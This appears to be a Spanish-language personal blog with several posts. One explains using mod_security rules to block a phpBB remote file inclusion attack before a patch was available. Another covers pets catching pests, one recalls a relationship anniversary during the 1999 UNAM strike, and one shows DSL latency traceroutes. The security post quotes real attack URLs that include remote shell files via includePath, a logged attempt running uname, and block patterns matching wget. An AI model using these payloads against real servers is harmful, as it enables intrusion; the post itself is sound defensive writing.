El Cuchitril

En algun momento mencione algo de esto… y la razon de por que lo estaba poniendo en mis maquinas… un buen ejemplo paso hace poco que no tenia oportunidad de actualizar una aplicación pero existia una manera de explotarla pero yo no podia parcharla hasta estar seguro, esto me planteaba dos posibilidades. 1) Sacar la aplicacion de producción 2) Arriesgarme a que explotaran esa debilidad…. Sin embargo mod_security permite un ‘hack’ es decir un arreglo rapido…

Digamos que alguien ya habia logrado colocar un bot de irc..

phpbb/page_tail.php?includePath=http://websurvey.burstmedia.com/cmd.gif

Podran ver que en donde esta el problema es que page_tail.php permite la inclusion de una pagina externa (la cual tiene como gif un shell es interesante si lo ven con un wget o con telnet, un navegador les va a decir que la imagen esta mal), entonces mientras me enteraba si existia un mejor fix y lidiaba con quien andaba merodeando por ahi… me añadi dos reglas (una de las cuales ya tenia pero no habia activado por un bomberazo).

SecFilterSelective THE_REQUEST «wget »
SecFilterSelective THE_REQUEST «p?includePath=http»

La primera revisa en las peticiones si encuentra la cadena wget y le da deny con un 403 y lo manda al log (claro requiere de configuración) pero aqui esta la parte practica.

La segunda busca la cadena especifica del exploit no solo en page_tail, sino practicamente en cualquier php… bueno aunque solo estuvo 12 horas sin parcharse justo quien tenia ganas de jugar siguio tocando a la puerta ;D

UNIQUE_ID: RE6UJMgXcZYAACo8AaU
Request: 200.154.52.5 – – [25/Apr/2006:16:27:00 -0500] «GET phpbb/page_tail.php?includePath=http://www.mptechno.cz/cse.gif?&cmd=uname%20-a
HTTP/1.0» 403 237
Handler: (null)
—————————————-
GET phpbb/page_tail.php?includePath=http://www.mptechno.cz/cse.gif?&cmd=uname%20-a HTTP/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: pt-br,pt;q=0.5
Cache-Control: max-age=259200
Connection: keep-alive
Host: foobar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.12) Gecko/200
50919 Firefox/1.0.7
Via: 1.1 loncoche.dialterra.com.br:3128 (squid/2.5.STABLE11)
X-Forwarded-For: 201.48.50.10
mod_security-message: Access denied with code 403. Pattern match «p?includePath=
http» at THE_REQUEST.
mod_security-action: 403

Es decir, **via mod_security puede uno bloquear ataques conocidos AUN antes de que exista un parche** para el problema o encontremos una solución al mismo.

En cierta forma me recuerda mucho el protowrapper de Gwolf… y como tal presenta probables exploits en si mismos, pero pensandolo bien, «Nada es seguro… solo los impuestos y la muerte».

Y la idea era comentar un poco la utilidad de mod_security.
En fin.
La historia se repite. Ese es uno de sus inconvenientes.
– Abresille.

Empatía.

1. f. Identificación mental y afectiva de un sujeto con el estado de ánimo de otro.

Y cucarachas son un mal comun por aqui, el usar insecticidas, no funciona muy bien, desde hace tiempo hemos considerado el efecto que tienen los mismos en el ecosistema y mas aun por ejemplo el que pudieran tener en mi sobrina…

Las trampas y venenos que se usan hoy en dia para las plagas es demasiado peligrosa para tenerlos, usarlos en casa.

Asi que en casa tenemos 2 gatas (Beleth y Jennessa) y fuera de la misma 2 perras, Pandora y Nugget…

Hace cosa de media hora Pandora (un labrador negro de unos 15KG), atrapo y me entrego una rata, a la cual pesco ante las miradas atonitas de mi cuñada y suegra… he de decir que la rata casi tenia el tamaño de mi gata mas pequeña.

Y Belleth ha dado ya cuenta de al menos 1 cucaracha que ha entrado por la coladera del baño… yo realmente lo prefiero asi a tener que poner ladrillos sobre las coladeras o ratoneras… ademas de que cuando he estado enfermo, son gran compañia las gatas.

En fin que digamos sale muy caro, pero lo prefiero a sufrir una intoxicación.

C’est la vie.

LUNES 19 DE ABRIL DE 1999

En una reunión en la explanada frente a la rectoría de la UNAM, ayer se integró la Asamblea de Padres de Familia, en apoyo al movimiento estudiantil en esa casa de estudios. Durante el acto, los asistentes criticaron la decisión de las autoridades universitarias de convocar para mañana a una manifestación que propiciaría enfrentamientos entre alumnos. La asamblea estudiantil universitaria refrendo que estudiantes de 30 centros educativos de la UNAM izarán, en el primer minuto de mañana, la bandera roginegra en sus respectivos planteles…

En otra parte… una platica mas personal se llevaba a cabo.

Un desvelado estudiante de licenciatura, asistia a comer a la UAM-X.

Una atracción mutua se discurria…

Una relación cambiaba de tono…

Una promesa se hacia…

Una complicidad nacia…

Y contra todo lo que pronosticaron y apostaron, si duramos mas que la huelga :D, que comenzo al siguiente dia.

7 años se dice facil…

Y los que faltan.

"No camines delante de mi, por que a lo mejor no te sigo
		No camines detrás de mi, por que a lo mejor no te guío
                             			 Mejor caminemos juntos..."
                                                                  Albert Camus

dsl-servicio-l200.uninet.net.mx (200.38.193.226) 621.764 ms 680.064 ms 947.204 ms

Segun me esta dando dolores de cabeza… la latencia en dsl-servicio esta canija

From East Coast – USA to YOU
Hop Host LOSS Rcv Sent Best Avg Worst
0 jfx-edge-01.inet.qwest.net 0% 60 60 0.45 0.60 3.62
1 jfk-core-01.inet.qwest.net 0% 60 60 0.80 2.95 70.99
2 jfk-brdr-02.inet.qwest.net 0% 60 60 0.68 0.78 0.96
3 qwest-gw.n54ny.ip.att.net 0% 60 60 0.81 0.90 1.08
4 12.123.0.94 0% 60 60 43.48 44.25 60.16
5 tbr2-cl15.wswdc.ip.att.net 0% 60 60 42.99 43.44 46.07
6 tbr1-cl27.wswdc.ip.att.net 0% 60 60 43.20 43.77 46.33
7 tbr1-cl4.sl9mo.ip.att.net 0% 60 60 42.63 43.16 53.13
8 tbr2-cl6.dlstx.ip.att.net 0% 60 60 43.23 43.71 45.69
9 gbr5-p40.dlstx.ip.att.net 0% 60 60 42.04 42.23 44.49
10 gar3-p360.dlstx.ip.att.net 0% 60 60 42.01 42.17 43.12
11 12.119.145.150 0% 60 60 39.52 40.47 77.38
12 bb-mex-vallejo-10-pos0-0.uninet.net.mx 2% 59 60 321.50 323.93 326.84
13 dsl-mex-ermita-1-pos1-0.uninet.net.mx 2% 59 60 323.47 326.10 379.80
14 ??? 100% 0 60 0.00 0.00 0.00
15 (YOUR ADDRESS) 2% 59 60 353.70 721.61 1297.10

From West Coast – USA to YOU
Hop Host LOSS Rcv Sent Best Avg Worst
0 so-4-2-0.mpr3.sjc2.us.above.net 0% 60 60 0.97 1.17 5.96
1 so-3-0-0.mpr2.sjc7.us.above.net 0% 60 60 1.17 3.82 42.27
2 above-oc12.sjc.wcg.net 0% 60 60 1.42 1.61 4.56
3 sntcca1wcx3-pos5-0-oc192.wcg.net 0% 60 60 1.43 1.52 1.68
4 dnvrco1wcx3-pos14-0.wcg.net 0% 60 60 47.43 47.65 53.17
5 dllstx1wcx2-pos1-0-oc192.wcg.net 0% 60 60 47.21 47.77 73.42
6 dllstx6lch1-pos4-1.wcg.net 0% 60 60 47.84 53.62 235.01
7 telmex-dllstx6lch1-ge8-1-wcg.net 0% 60 60 47.88 48.26 50.52
8 bup-mex-vallejo-11-POS4-0.uninet.net.mx 0% 60 60 80.78 81.18 83.16
9 bb-mex-vallejo-21-g0-0.uninet.net.mx 0% 60 60 79.66 80.15 85.06
10 inet-mex-popocatepetl-20-pos-13-0.uninet.net.mx 0% 60 60 79.75 80.10 84.26
11 dsl-mex-ermita-1-pos1-0.uninet.net.mx 2% 59 60 79.92 83.97 172.72
12 ??? 100% 0 60 0.00 0.00 0.00
13 (YOUR ADDRESS) 2% 59 60 200.41 722.61 1386.90

A ratos el upload esta como dialup a ratos el download esta peor que dial up a la hora de hacer las pruebas ahi la llevaba el upload, pero rato hace tenia 56kbs..

** He de aclarar que se supone tengo 1mbit x 256 :D **

Pero me ha dado flojera justo por ser sábado de gloria

Disrespect me, tell me Im older, tell me Im slower, tell me I can no longer fly… I want you to do.
M.J.